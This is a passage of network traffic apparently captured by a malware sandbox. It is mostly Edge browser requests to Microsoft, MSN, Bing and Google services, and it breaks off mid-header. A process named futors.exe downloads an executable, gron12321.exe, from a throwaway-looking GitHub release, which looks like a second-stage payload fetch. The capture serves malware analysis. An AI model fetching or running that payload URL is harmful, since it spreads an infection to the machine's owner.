msn-api.go2yd.com zerocodecms.blob.core.windows.net *.oneservice.msn.com *.oneservice.msn.cn api.msn.com api.msn.cn ent-api.msn.com ent-api.msn.cn ent-nf-api.msn.com ent-nf-api.msn.cn ppe-api.msn.com ppe-api.msn.cn graph.microsoft.com/beta/ graph.microsoft.com/v1.0/ https://*.vo.msecnd.net https://user.auth.xboxlive.com/user/authenticate https://xsts.auth.xboxlive.com/xsts/authorize https://titlehub.xboxlive.com/users/ https://t.ssl.ak.dynamic.tiles.virtualearth.net https://dynamic.t0.tiles.ditu.live.com https://dev.virtualearth.net/REST/v1/Routes/ https://dev.ditu.live.com/REST/v1/Routes/ https://dev.virtualearth.net/REST/v1/Locations/ https://dev.ditu.live.com/REST/v1/Locations/ browser.events.data.microsoft.com ib.msn.com https://proxy.uet.s.microsoft.com/tpv-dv/;default-src 'none';font-src 'self' data: assets.msn.com assets2.msn.com assets.msn.cn assets2.msn.cn;frame-src https://api.msn.com/auth/cookie/silentpassport https://api.msn.cn/auth/cookie/silentpassport https://www.msn.com https://www.msn.cn https://www.microsoftstart.com login.live.com login.microsoftonline.com www.bing.com/covid www.bing.com/rewardsapp/flyout www.bing.com/shop www.bing.com/shop/halloween www.bing.com/videos/search www.facebook.com www.odwebp.svc.ms www.youtube.com msn.pluto.tv www.bing.com/wpt/prefetchcib https://res.cdn.office.net/ business.bing.com sip: mailto: edge-auth.microsoft.com;img-src https://* blob: chrome-search://ntpicon/ chrome-search://local-ntp/ chrome-search://theme/ data:;media-src 'self' blob: *.mavideo.microsoft.com assets.msn.com assets2.msn.com assets.msn.cn assets2.msn.cn https://sapphire.azureedge.net th.bing.com/th wus-streaming-video-msn-com.akamaized.net prod-streaming-video-msn-com.akamaized.net prod-streaming-video.msn.cn video.yidianzixun.com liveshopping.azureedge.net;report-to csp-endpoint;require-trusted-types-for 'script';style-src 'self' 'unsafe-inline' c.s-microsoft.com/mscc/ assets.msn.com assets2.msn.com assets.msn.cn assets2.msn.cn;trusted-types serviceWorkerUrlPolicy baw-trustedtypes-policy svgPassThroughPolicy xmlPassThroughPolicy webpackTrustedTypesPolicy webWorkerUrlPolicy inlineHeadCssPassthroughPolicy bundleUrlPolicy fallbackBundleUrlPolicy scriptSrcUrlPolicy commonAsScriptPolicy dompurify fast-html base-html-policy ot-trusted-type-policy default 'allow-duplicates' IasUrlPolicy DvUrlPolicy;worker-src 'self' blob: 'report-sample';script-src 'nonce-1c7vWvKsoxIIqgWG7YIlQsiesCGh01GNYJmzyFE/dkk=' 'strict-dynamic',script-src 'nonce-1c7vWvKsoxIIqgWG7YIlQsiesCGh01GNYJmzyFE/dkk=' 'self' 'report-sample' assets.msn.cn assets2.msn.cn assets.msn.com assets2.msn.com www.msn.com www.msn.cn c.s-microsoft.com/mscc/ geolocation.onetrust.com/cookieconsentpub/v1/geo/location https://www.clarity.ms platform.bing.com/geo/AutoSuggest/v1 www.bing.com/as/ www.bing.com/s/as/ www.youtube.com js.monitor.azure.com business.bing.com/msb/;worker-src * blob:
x-robots-tag: noindex
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-xss-protection: 1
x-ua-compatible: IE=Edge;chrome=1
x-fabric-cluster: pmeprodneu
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]},{"group":"csp-endpoint","max_age":86400,"endpoints":[{"url":"https://deff.nelreports.net/api/report"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.5}
strict-transport-security: max-age=1209600; includeSubDomains; preload
accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA, Sec-CH-Viewport-Width, Sec-CH-Viewport-Height, Sec-CH-Prefers-Color-Scheme, Device-Memory, Downlink, ECT, RTT, Sec-CH-DPR
x-ceto-ref: 67e74d39570743329f61d03041601c9c|AFD:583592B502F9469CBA059551F752EDAF|2025-03-29T01:30:33.540Z
x-cache: CONFIG_NOCACHE
x-msedge-ref: Ref A: 583592B502F9469CBA059551F752EDAF Ref B: LON04EDGE0713 Ref C: 2025-03-29T01:30:33Z
date: Sat, 29 Mar 2025 01:30:33 GMT
GET

https://ntp.msn.com/bundles/v1/edgeChromium/latest/web-worker.0fc632316541800cc1c2.js

msedge.exe

Remote address:

204.79.197.203:443

Request

GET /bundles/v1/edgeChromium/latest/web-worker.0fc632316541800cc1c2.js HTTP/2.0
host: ntp.msn.com
accept: */*
dnt: 1
sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"imageAndVideo","dsp":1,"en_widget_reg":false,"exp":["msAllowThemeInstallationFromChromeStore","msUndersideAutoOpenForMsnTopQuestion","msNurturingMetadataTemplate","msNurturingOnboardNTPToCE"],"feed_dis":"peek","layout":1,"quick_links_opt":1,"seen_new_dev_fre":false,"sel_feed_piv":"","show_greet":true,"vt_opened":false}
x-edge-shopping-flag: 0
sec-ms-gec: 87D8E2F0684282DF6DE350AC7863058B54E0BD2F3A683830CF6A57A64DC4065D
sec-ms-gec-version: 1-133.0.3065.69
x-client-data: eyIxIjoiMCIsIjIiOiIwIiwiMyI6IjAiLCI0IjoiNTI1OTQxMTIwODk0MjAwMzY1OSIsIjYiOiJzdGFibGUiLCI5IjoiZGVza3RvcCJ9
sec-fetch-site: same-origin
sec-fetch-mode: same-origin
sec-fetch-dest: worker
referer: https://ntp.msn.com/edge/ntp?locale=en-US&title=New%20tab&dsp=1&sp=Bing&startpage=1&PC=U531
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Edg/133.0.0.0
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: _C_ETH=1
cookie: sptmarket=en-US||gb|en-gb|en-gb|en||cf=8|RefA=583592B502F9469CBA059551F752EDAF.RefC=2025-03-29T01:30:33Z
cookie: USRLOC=
cookie: MUID=1BCC9635343F60E02399838B3518610E
cookie: MUIDB=1BCC9635343F60E02399838B3518610E
cookie: _EDGE_S=F=1&SID=1E62984E5275615728728DF0538A60A8
cookie: _EDGE_V=1
priority: u=4, i

Response

HTTP/2.0 200

cache-control: public, no-transform, max-age=31535892
content-length: 8941
content-type: application/javascript
content-encoding: br
content-md5: NEcwkWdqrDHu6urh5gFg+g==
last-modified: Wed, 26 Mar 2025 19:38:41 GMT
etag: 0x8DD6C9DD047325F
vary: Origin
x-cache: TCP_HIT
x-ms-request-id: 70d0c86b-f01e-010d-1286-9e8da4000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
akamai-request-bc: [a=23.73.139.22,b=172545340,c=g,n=GB_EN_SLOUGH,o=20940]
server-timing: clientrtt; dur=0, clienttt; dur=9, origin; dur=0, cdntime; dur=9, wpo;dur=0,1s;dur=0
akamai-cache-status: Hit from child
akamai-server-ip: 23.73.139.22
akamai-request-id: a48d53c
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.1}
timing-allow-origin: *
akamai-grn: 0.168b4917.1743048539.a48d53c
x-cid: 7
x-ccc: GB
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 8BF707D31EFF483B96FCF6C548020142 Ref B: LON04EDGE0713 Ref C: 2025-03-29T01:30:33Z
date: Sat, 29 Mar 2025 01:30:33 GMT
GET

https://ntp.msn.com/bundles/v1/edgeChromium/latest/SSR-extension.828d19e24cc86fbcd5c9.js

msedge.exe

Remote address:

204.79.197.203:443

Request

GET /bundles/v1/edgeChromium/latest/SSR-extension.828d19e24cc86fbcd5c9.js HTTP/2.0
host: ntp.msn.com
origin: https://ntp.msn.com
sec-ch-ua-platform: "Windows"
sec-ch-ua-full-version-list: "Not(A:Brand";v="99.0.0.0", "Microsoft Edge";v="133.0.3065.69", "Chromium";v="133.0.6943.99"
device-memory: 8
sec-ch-ua: "Not(A:Brand";v="99", "Microsoft Edge";v="133", "Chromium";v="133"
sec-ch-dpr: 1
sec-ch-ua-model: ""
sec-ch-ua-mobile: ?0
sec-ch-ua-bitness: "64"
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "133.0.3065.69"
sec-ch-viewport-width: 1026
downlink: 1.5
sec-ch-viewport-height: 533
ect: 4g
sec-ch-prefers-color-scheme: light
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Edg/133.0.0.0
dnt: 1
rtt: 100
sec-ch-ua-platform-version: "10.0.0"
accept: */*
sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"imageAndVideo","dsp":1,"en_widget_reg":false,"exp":["msAllowThemeInstallationFromChromeStore","msUndersideAutoOpenForMsnTopQuestion","msNurturingMetadataTemplate","msNurturingOnboardNTPToCE"],"feed_dis":"peek","layout":1,"quick_links_opt":1,"seen_new_dev_fre":false,"sel_feed_piv":"","show_greet":true,"vt_opened":false}
x-edge-shopping-flag: 0
sec-ms-gec: 87D8E2F0684282DF6DE350AC7863058B54E0BD2F3A683830CF6A57A64DC4065D
sec-ms-gec-version: 1-133.0.3065.69
x-client-data: eyIxIjoiMCIsIjIiOiIwIiwiMyI6IjAiLCI0IjoiNTI1OTQxMTIwODk0MjAwMzY1OSIsIjYiOiJzdGFibGUiLCI5IjoiZGVza3RvcCJ9
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: script
referer: https://ntp.msn.com/edge/ntp?locale=en-US&title=New%20tab&dsp=1&sp=Bing&startpage=1&PC=U531
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: _C_ETH=1
cookie: sptmarket=en-US||gb|en-gb|en-gb|en||cf=8|RefA=583592B502F9469CBA059551F752EDAF.RefC=2025-03-29T01:30:33Z
cookie: USRLOC=
cookie: MUID=1BCC9635343F60E02399838B3518610E
cookie: MUIDB=1BCC9635343F60E02399838B3518610E
cookie: _EDGE_S=F=1&SID=1E62984E5275615728728DF0538A60A8
cookie: _EDGE_V=1
priority: u=1

Response

HTTP/2.0 200

cache-control: public, no-transform, max-age=31535892
content-length: 10890
content-type: application/javascript
content-encoding: br
content-md5: pGCEVF2a6BgENnW9+pwBdg==
last-modified: Fri, 21 Mar 2025 19:30:14 GMT
etag: 0x8DD68AECDC09DF4
vary: Origin
x-cache: TCP_HIT
x-ms-request-id: b0080afc-a01e-0085-4e97-9adfb2000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
akamai-request-bc: [a=2.19.253.138,b=611291,c=g,n=GB_EN_SLOUGH,o=20940],[c=p,n=GB_EN_SLOUGH,o=20940]
server-timing: clientrtt; dur=0, clienttt; dur=2, origin; dur=0, cdntime; dur=2, wpo;dur=0,1s;dur=0
akamai-cache-status: Miss from child, Hit from parent
akamai-server-ip: 2.19.253.138
akamai-request-id: 953db
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.1}
timing-allow-origin: *
akamai-grn: 0.8afd1302.1743018043.953db
x-cid: 7
x-ccc: GB
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 7E2B5D39372D4666AFB31682D7E97CEC Ref B: LON04EDGE0713 Ref C: 2025-03-29T01:30:33Z
date: Sat, 29 Mar 2025 01:30:33 GMT
GET

https://edge.microsoft.com/extensionwebstorebase/v1/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=edgecrx&prodchannel=&prodversion=133.0.3065.69&lang=en-US&acceptformat=crx3,puff&x=id%3Djmjflgjpcpepeafmmgdpfkogkghcpiha%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1

msedge.exe

Remote address:

150.171.27.11:443

Request

GET /extensionwebstorebase/v1/crx?os=win&arch=x64&os_arch=x86_64&nacl_arch=x86-64&prod=edgecrx&prodchannel=&prodversion=133.0.3065.69&lang=en-US&acceptformat=crx3,puff&x=id%3Djmjflgjpcpepeafmmgdpfkogkghcpiha%26v%3D0.0.0.0%26installedby%3Dother%26uc%26ping%3Dr%253D-1%2526e%253D1 HTTP/2.0
host: edge.microsoft.com
edgefeatureflags: {"ExtensionUseNewStoreKeys":true,"UseHttpsForDownload":true}
update-interactivity: fg
ms-cv: UHQperU2IIHx/qq56bTFMV
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Edg/133.0.0.0
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
priority: u=1, i

Response

HTTP/2.0 200

cache-control: max-age=0, no-cache, no-store, must-revalidate
content-length: 779
content-type: text/xml; charset=utf-8
x-cache: CONFIG_NOCACHE
x-msedge-ref: Ref A: F13A18C1C9674CF0BDC6B7550AF56EBE Ref B: LON04EDGE1121 Ref C: 2025-03-29T01:30:33Z
date: Sat, 29 Mar 2025 01:30:32 GMT
GET

https://copilot.microsoft.com/c/api/user/eligibility

msedge.exe

Remote address:

95.101.143.218:443

Request

GET /c/api/user/eligibility HTTP/2.0
host: copilot.microsoft.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
sec-fetch-storage-access: active
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Edg/133.0.0.0
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
priority: u=4, i

Response

HTTP/2.0 200

x-ceto-ref: 67e74d39c8e74cb8a94b9079d2e9492b|AFD:67e74d39c8e74cb8a94b9079d2e9492b|2025-03-29T01:30:33.499Z
content-length: 0
date: Sat, 29 Mar 2025 01:30:33 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.3d367a5c.1743211833.5f72cc2
DNS

clients2.googleusercontent.com

chrome.exe

Remote address:

8.8.8.8:53

Request

clients2.googleusercontent.com

IN A

Response

clients2.googleusercontent.com

IN CNAME

googlehosted.l.googleusercontent.com

googlehosted.l.googleusercontent.com

IN A

142.250.200.1
DNS

clients2.googleusercontent.com

chrome.exe

Remote address:

8.8.8.8:53

Request

clients2.googleusercontent.com

IN Unknown

Response

clients2.googleusercontent.com

IN CNAME

googlehosted.l.googleusercontent.com
GET

https://clients2.googleusercontent.com/crx/blobs/Ad_brx3-BuL0c-lurTuHDvLGx_3o1po6xdCJ6biVPWmOWpEAIO3qQwYr84tWN8xt3Y-b4FBELB16YJo65m5b1LlifuobAPibVoX_4l94iArbx2Gsn4X-g9109tXuJL65PgYAxlKa5UnJV70rV6RKReARs98yYD2dVaKO/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_90_1_0.crx

msedge.exe

Remote address:

142.250.200.1:443

Request

GET /crx/blobs/Ad_brx3-BuL0c-lurTuHDvLGx_3o1po6xdCJ6biVPWmOWpEAIO3qQwYr84tWN8xt3Y-b4FBELB16YJo65m5b1LlifuobAPibVoX_4l94iArbx2Gsn4X-g9109tXuJL65PgYAxlKa5UnJV70rV6RKReARs98yYD2dVaKO/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_90_1_0.crx HTTP/2.0
host: clients2.googleusercontent.com
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Edg/133.0.0.0
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
priority: u=1, i
DNS

assets.msn.com

msedge.exe

Remote address:

8.8.8.8:53

Request

assets.msn.com

IN A

Response

assets.msn.com

IN CNAME

assets.msn.com.edgesuite.net

assets.msn.com.edgesuite.net

IN CNAME

a233.dscd.akamai.net

a233.dscd.akamai.net

IN A

2.18.190.171

a233.dscd.akamai.net

IN A

2.18.190.182
DNS

assets.msn.com

msedge.exe

Remote address:

8.8.8.8:53

Request

assets.msn.com

IN Unknown

Response

assets.msn.com

IN CNAME

assets.msn.com.edgesuite.net

assets.msn.com.edgesuite.net

IN CNAME

a233.dscd.akamai.net
GET

https://assets.msn.com/staticsb/statics/latest/oneTrust/2.0/scripttemplates/otSDKStub.js

msedge.exe

Remote address:

2.18.190.171:443

Request

GET /staticsb/statics/latest/oneTrust/2.0/scripttemplates/otSDKStub.js HTTP/2.0
host: assets.msn.com
sec-ch-ua-platform: "Windows"
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Edg/133.0.0.0
sec-ch-ua: "Not(A:Brand";v="99", "Microsoft Edge";v="133", "Chromium";v="133"
dnt: 1
sec-ch-ua-mobile: ?0
accept: */*
x-edge-shopping-flag: 0
sec-ms-gec: 87D8E2F0684282DF6DE350AC7863058B54E0BD2F3A683830CF6A57A64DC4065D
sec-ms-gec-version: 1-133.0.3065.69
x-client-data: eyIxIjoiMCIsIjIiOiIwIiwiMyI6IjAiLCI0IjoiNTI1OTQxMTIwODk0MjAwMzY1OSIsIjYiOiJzdGFibGUiLCI5IjoiZGVza3RvcCJ9
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: _C_ETH=1
cookie: USRLOC=
cookie: MUID=1BCC9635343F60E02399838B3518610E
cookie: _EDGE_S=F=1&SID=1E62984E5275615728728DF0538A60A8
cookie: _EDGE_V=1
if-none-match: 0x8DD621E1B512A70
if-modified-since: Thu, 13 Mar 2025 10:59:20 GMT
priority: u=1

Response

HTTP/2.0 200

content-type: application/javascript
content-md5: 1oPpUrcNmix20k/3jB4TgA==
last-modified: Fri, 28 Mar 2025 13:43:19 GMT
etag: 0x8DD6DFE7FE974C6
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 4c6843bd-801e-007a-2924-a0a63d000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: gzip
date: Sat, 29 Mar 2025 01:30:33 GMT
content-length: 7496
alt-svc: h3=":443"; ma=86400
akamai-request-bc: [a=2.18.181.182,b=737808237,c=g,n=GB_EN_LONDON,o=20940]
server-timing: clientrtt; dur=43, clienttt; dur=7, origin; dur=0, cdntime; dur=7, wpo;dur=0,1s;dur=0
akamai-cache-status: Hit from child
akamai-server-ip: 2.18.181.182
akamai-request-id: 2bfa0f6d
cache-control: public, max-age=1209600
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.1}
timing-allow-origin: *
akamai-grn: 0.b6b51202.1743211833.2bfa0f6d
vary: Origin
DNS

msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com

msedge.exe

Remote address:

8.8.8.8:53

Request

msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com

IN A

Response

msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com

IN CNAME

star.sf.tlu.dl.delivery.mp.microsoft.com.delivery.microsoft.com

star.sf.tlu.dl.delivery.mp.microsoft.com.delivery.microsoft.com

IN CNAME

cdp-f-ssl-tlu-net.trafficmanager.net

cdp-f-ssl-tlu-net.trafficmanager.net

IN CNAME

star.sb.tlu.dl.delivery.mp.microsoft.com.edgesuite.net

star.sb.tlu.dl.delivery.mp.microsoft.com.edgesuite.net

IN CNAME

a2033.dscd.akamai.net

a2033.dscd.akamai.net

IN A

2.18.190.174

a2033.dscd.akamai.net

IN A

2.18.190.170
DNS

msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com

msedge.exe

Remote address:

8.8.8.8:53

Request

msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com

IN Unknown

Response

msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com

IN CNAME

star.sf.tlu.dl.delivery.mp.microsoft.com.delivery.microsoft.com

star.sf.tlu.dl.delivery.mp.microsoft.com.delivery.microsoft.com

IN CNAME

cdp-f-ssl-tlu-net.trafficmanager.net

cdp-f-ssl-tlu-net.trafficmanager.net

IN CNAME

star.sb.tlu.dl.delivery.mp.microsoft.com.edgesuite.net

star.sb.tlu.dl.delivery.mp.microsoft.com.edgesuite.net

IN CNAME

a2033.dscd.akamai.net
GET

https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/bdc392b9-6b81-4aaa-b3ee-2fffd9562edb?P1=1743816634&P2=404&P3=2&P4=btFG9A%2fc4P4hxW%2fg37a8YcV9RQMA6NSmYNOlO4ZJ62Fcg82o7SeziN9DbQ5A%2fb1YvYFiUgVCqJgeruX25bwkDQ%3d%3d

msedge.exe

Remote address:

2.18.190.174:443

Request

GET /filestreamingservice/files/bdc392b9-6b81-4aaa-b3ee-2fffd9562edb?P1=1743816634&P2=404&P3=2&P4=btFG9A%2fc4P4hxW%2fg37a8YcV9RQMA6NSmYNOlO4ZJ62Fcg82o7SeziN9DbQ5A%2fb1YvYFiUgVCqJgeruX25bwkDQ%3d%3d HTTP/2.0
host: msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com
ms-cv: UHQperU2IIHx/qq56bTFMV
sec-fetch-site: none
sec-fetch-mode: no-cors
sec-fetch-dest: empty
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/133.0.0.0 Safari/537.36 Edg/133.0.0.0
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
priority: u=1, i

Response

HTTP/2.0 200

content-type: application/x-chrome-extension
last-modified: Wed, 24 Jan 2024 00:25:37 GMT
accept-ranges: bytes
etag: "Gv3jDkaZdFLRHkoq2781zOehQE8="
server: Microsoft-IIS/10.0
x-aspnetmvc-version: 5.3
ms-correlationid: 20036c22-ae57-4ba2-bb26-a93a04455436
ms-requestid: ec427af9-cb86-4b47-9eeb-dbfcab5ebbe1
ms-cv: 7F5PrcnCOKZcahtWcrOI3l.0
x-aspnet-version: 4.0.30319
x-powered-by: ASP.NET
x-powered-by: ARR/3.0
x-powered-by: ASP.NET
content-length: 11185
cache-control: public, max-age=86400
date: Sat, 29 Mar 2025 01:30:34 GMT
alt-svc: h3=":443"; ma=93600,h3-29=":443"; ma=93600,quic=":443"; ma=93600; v="43"
akamai-request-bc: [a=2.18.181.174,b=682281685,c=g,n=GB_EN_LONDON,o=20940],[c=c,n=GB_EN_LONDON,o=20940]
msregion:
x-ccc:
x-cid: 3
akamai-grn: 0.aeb51202.1743211833.28aacad5
access-control-max-age: 86400
access-control-allow-credentials: true
access-control-expose-headers: Server,range,hdntl,hdnts,Akamai-Mon-Iucid-Ing,Akamai-Mon-Iucid-Del,Akamai-Request-BC
access-control-allow-headers: origin,range,hdntl,hdnts,CMCD-Request,CMCD-Object,CMCD-Status,CMCD-Session
access-control-allow-methods: GET,POST,OPTIONS
access-control-allow-origin: *
DNS

img-s-msn-com.akamaized.net

msedge.exe

Remote address:

8.8.8.8:53

Request

img-s-msn-com.akamaized.net

IN A

Response

img-s-msn-com.akamaized.net

IN CNAME

a1834.dscg2.akamai.net

a1834.dscg2.akamai.net

IN A

2.19.252.151

a1834.dscg2.akamai.net

IN A

2.19.252.154
DNS

img-s-msn-com.akamaized.net

msedge.exe

Remote address:

8.8.8.8:53

Request

img-s-msn-com.akamaized.net

IN Unknown

Response

img-s-msn-com.akamaized.net

IN CNAME

a1834.dscg2.akamai.net
DNS

sb.scorecardresearch.com

msedge.exe

Remote address:

8.8.8.8:53

Request

sb.scorecardresearch.com

IN A

Response

sb.scorecardresearch.com

IN A

52.85.92.104

sb.scorecardresearch.com

IN A

52.85.92.105

sb.scorecardresearch.com

IN A

52.85.92.116

sb.scorecardresearch.com

IN A

52.85.92.87
DNS

sb.scorecardresearch.com

msedge.exe

Remote address:

8.8.8.8:53

Request

sb.scorecardresearch.com

IN Unknown

Response
DNS

th.bing.com

msedge.exe

Remote address:

8.8.8.8:53

Request

th.bing.com

IN A

Response

th.bing.com

IN CNAME

p-th.bing.com.trafficmanager.net

p-th.bing.com.trafficmanager.net

IN CNAME

th.bing.com.edgekey.net

th.bing.com.edgekey.net

IN CNAME

e86303.dscx.akamaiedge.net

e86303.dscx.akamaiedge.net

IN A

95.101.143.219

e86303.dscx.akamaiedge.net

IN A

88.221.135.33

e86303.dscx.akamaiedge.net

IN A

88.221.135.34

e86303.dscx.akamaiedge.net

IN A

88.221.135.25

e86303.dscx.akamaiedge.net

IN A

88.221.135.27

e86303.dscx.akamaiedge.net

IN A

95.101.143.201
DNS

th.bing.com

msedge.exe

Remote address:

8.8.8.8:53

Request

th.bing.com

IN Unknown

Response

th.bing.com

IN CNAME

p-th.bing.com.trafficmanager.net

p-th.bing.com.trafficmanager.net

IN CNAME

th.bing.com.edgekey.net

th.bing.com.edgekey.net

IN CNAME

e86303.dscx.akamaiedge.net
DNS

github.com

futors.exe

Remote address:

8.8.8.8:53

Request

github.com

IN A

Response

github.com

IN A

20.26.156.215
DNS

c.msn.com

msedge.exe

Remote address:

8.8.8.8:53

Request

c.msn.com

IN A

Response

c.msn.com

IN CNAME

c-msn-pme.trafficmanager.net

c-msn-pme.trafficmanager.net

IN A

13.74.129.1
DNS

c.msn.com

msedge.exe

Remote address:

8.8.8.8:53

Request

c.msn.com

IN Unknown

Response

c.msn.com

IN CNAME

c-msn-pme.trafficmanager.net
DNS

c.bing.com

msedge.exe

Remote address:

8.8.8.8:53

Request

c.bing.com

IN A

Response

c.bing.com

IN CNAME

c-bing-com.ax-0001.ax-msedge.net

c-bing-com.ax-0001.ax-msedge.net

IN CNAME

ax-0001.ax-msedge.net

ax-0001.ax-msedge.net

IN A

150.171.27.10

ax-0001.ax-msedge.net

IN A

150.171.28.10
DNS

c.bing.com

msedge.exe

Remote address:

8.8.8.8:53

Request

c.bing.com

IN Unknown

Response

c.bing.com

IN CNAME

c-bing-com.ax-0001.ax-msedge.net

c-bing-com.ax-0001.ax-msedge.net

IN CNAME

ax-0001.ax-msedge.net
GET

https://github.com/legendary99999/dsfadsfafd/releases/download/dfgvsfdvbafd/gron12321.exe

futors.exe

Remote address:

20.26.156.215:443

Request

GET /legendary99999/dsfadsfafd/releases/download/dfgvsfdvbafd/gron12321.exe HTTP/1.1
Host: github.com

Response

HTTP/1.1 302 Found

Date: Sat, 29 Mar 2025 01:30:35 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 0
Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame,Accept-Encoding, Accept, X-Requested-With
Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/954811811/dc4de189-3672-406e-ba17-8726ca7beb9b?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20250329%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20250329T013035Z&X-Amz-Expires=300&X-Amz-Signature=2767bd71fc66b7986d952c20b9bafe3cf85c4da9287a5f4470013514905158c6&X-Amz-SignedHeaders=host&response-content-disposition=attachment%3B%20filename%3Dgron12321.exe&response-content-type=application%2Foctet-stream
Cache-Control: no-cache
Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
X-Frame-Options: deny
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Referrer-Policy: no-referrer-when-downgrade
Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.githubassets.com github.com/assets-cdn/worker/ github.com/assets/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com *.rel.tunnels.api.visualstudio.com wss://*.rel.tunnels.api.visualstudio.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com proxy.individual.githubcopilot.com proxy.business.githubcopilot.com proxy.enterprise.githubcopilot.com *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ 